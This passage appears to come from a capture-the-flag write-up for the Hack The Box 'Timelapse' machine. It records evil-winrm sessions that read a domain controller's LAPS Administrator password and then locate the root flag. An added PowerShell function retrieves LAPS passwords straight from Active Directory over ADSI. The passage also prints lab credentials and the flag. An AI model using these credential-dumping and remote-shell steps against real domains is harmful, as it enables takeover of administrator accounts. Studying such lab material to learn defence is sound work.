LAPS rotates the password once the ExpirationTimestamp passes, so it may have changed. Fetch it again as svc_deploy:

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload AdmPwd.PS
                                        
Info: Uploading /home/kali/HTB/timelapse/AdmPwd.PS to C:\Users\svc_deploy\Documents\AdmPwd.PS
                                        
Data: 42372 bytes of 42372 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-Command -Module 'AdmPwd.PS'

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Cmdlet          Find-AdmPwdExtendedRights                          5.0.0.0    AdmPwd.PS
Cmdlet          Get-AdmPwdPassword                                 5.0.0.0    AdmPwd.PS
Cmdlet          Reset-AdmPwdPassword                               5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdAuditing                                 5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdComputerSelfPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdReadPasswordPermission                   5.0.0.0    AdmPwd.PS
Cmdlet          Set-AdmPwdResetPasswordPermission                  5.0.0.0    AdmPwd.PS
Cmdlet          Update-AdmPwdADSchema                              5.0.0.0    AdmPwd.PS


*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-AdmPwdPassword -ComputerName DC01 | Format-List


ComputerName        : DC01
DistinguishedName   : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
Password            : I5wQ0fGrS}M;}xe+6KtQ5b3]
ExpirationTimestamp : 9/20/2023 6:06:08 AM



*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

New password – I5wQ0fGrS}M;}xe+6KtQ5b3]
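The LAPS password rotated between sessions because ms-Mcs-AdmPwdExpirationTime is enforced on the client side: when the DC came back up past its expiry, the LAPS client set a new password and wrote it to the computer object. Get-AdmPwdPassword is only a thin wrapper around an LDAP read of that object, so the same lookup can be done with the ADSI searcher that ships with PowerShell on any domain-joined host, with nothing to upload. The function below is an added example, not code from the original write-up; the function name, the ReadAllowed field and the output shape are my own, while the two attribute names are the real LAPS schema attributes.

```powershell
# Added example (not from the original write-up): read the LAPS-managed local
# Administrator password of a computer straight from its AD object via ADSI,
# without uploading the AdmPwd.PS module. Works for any principal that has been
# granted read on the confidential attribute ms-Mcs-AdmPwd (here svc_deploy).
function Get-LapsPasswordAdsi {
    param(
        [Parameter(Mandatory)][string]$ComputerName   # e.g. 'DC01'
    )

    # Computer accounts have a trailing '$' in sAMAccountName; the backtick
    # keeps PowerShell from treating it as a variable expansion.
    $filter   = "(&(objectCategory=computer)(sAMAccountName=$ComputerName`$))"
    $searcher = [adsisearcher]$filter
    $searcher.PropertiesToLoad.AddRange(
        [string[]]@('distinguishedName', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'))

    $result = $searcher.FindOne()
    if (-not $result) { throw "Computer object '$ComputerName' not found in the current domain" }

    # DirectorySearcher lower-cases property names in the result collection.
    $props = $result.Properties

    # ms-Mcs-AdmPwd is marked confidential in the schema: if the caller lacks
    # the extended read right, the attribute is simply absent from the result
    # rather than producing an access-denied error, so 'missing' means 'denied'.
    $pwd = if ($props['ms-mcs-admpwd'].Count) { [string]$props['ms-mcs-admpwd'][0] } else { $null }

    # Expiration is stored as a Windows FILETIME (100-ns ticks since 1601-01-01
    # UTC) in an Int64; convert it so you know when the password will rotate
    # next (shown in UTC here, whereas Get-AdmPwdPassword prints local time).
    $exp = if ($props['ms-mcs-admpwdexpirationtime'].Count) {
        [DateTime]::FromFileTimeUtc([int64]$props['ms-mcs-admpwdexpirationtime'][0])
    } else { $null }

    [pscustomobject]@{
        ComputerName        = $ComputerName
        DistinguishedName   = [string]$props['distinguishedname'][0]
        Password            = $pwd
        ExpirationTimestamp = $exp
        ReadAllowed         = [bool]$pwd   # false when the attribute was withheld
    }
}

Get-LapsPasswordAdsi -ComputerName 'DC01' | Format-List
```

Check ExpirationTimestamp before relying on a recovered password: once it passes, the next LAPS client cycle on that host will replace the password, which is exactly why the first Administrator session here stopped working after the reboot. If ReadAllowed comes back false, the account you are running as is not in the group that holds the ms-Mcs-AdmPwd read right, and the rest of the output is not a useful signal.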

We connect again as Administrator with the new password, but still cannot find the flag in the Administrator profile.

┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ evil-winrm -S -i 10.10.11.152 -u administrator -p 'I5wQ0fGrS}M;}xe+6KtQ5b3]'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: SSL enabled
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---       10/23/2021  11:27 AM                3D Objects
d-r---       10/23/2021  11:27 AM                Contacts
d-r---         3/3/2022   7:48 PM                Desktop
d-r---       10/23/2021  12:22 PM                Documents
d-r---       10/25/2021   2:06 PM                Downloads
d-r---       10/23/2021  11:27 AM                Favorites
d-r---       10/23/2021  11:28 AM                Links
d-r---       10/23/2021  11:27 AM                Music
d-r---       10/23/2021  11:27 AM                Pictures
d-r---       10/23/2021  11:27 AM                Saved Games
d-r---       10/23/2021  11:27 AM                Searches
d-r---       10/23/2021  11:27 AM                Videos


*Evil-WinRM* PS C:\Users\Administrator> ls -Recurse | ? { $_.Name -eq 'root.txt' }
*Evil-WinRM* PS C:\Users\Administrator> 

Recursively search for the file from C:\ instead: ls -Recurse | ? { $_.Name -eq 'root.txt' }

*Evil-WinRM* PS C:\Users\Administrator> 
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../
*Evil-WinRM* PS C:\Users\Administrator> cd ../
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX


*Evil-WinRM* PS C:\Users> cd ../
*Evil-WinRM* PS C:\> ls -Recurse | ? { $_.Name -eq 'root.txt' }



    Directory: C:\Users\TRX\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/15/2023   6:06 AM             34 root.txt
^C

                                        
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\> cd C:\Users\TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
51133447a29f21056ee6ded62a00f9d5
*Evil-WinRM* PS C:\Users\TRX\Desktop> 

We get the flag – 51133447a29f21056ee6ded62a00f9d5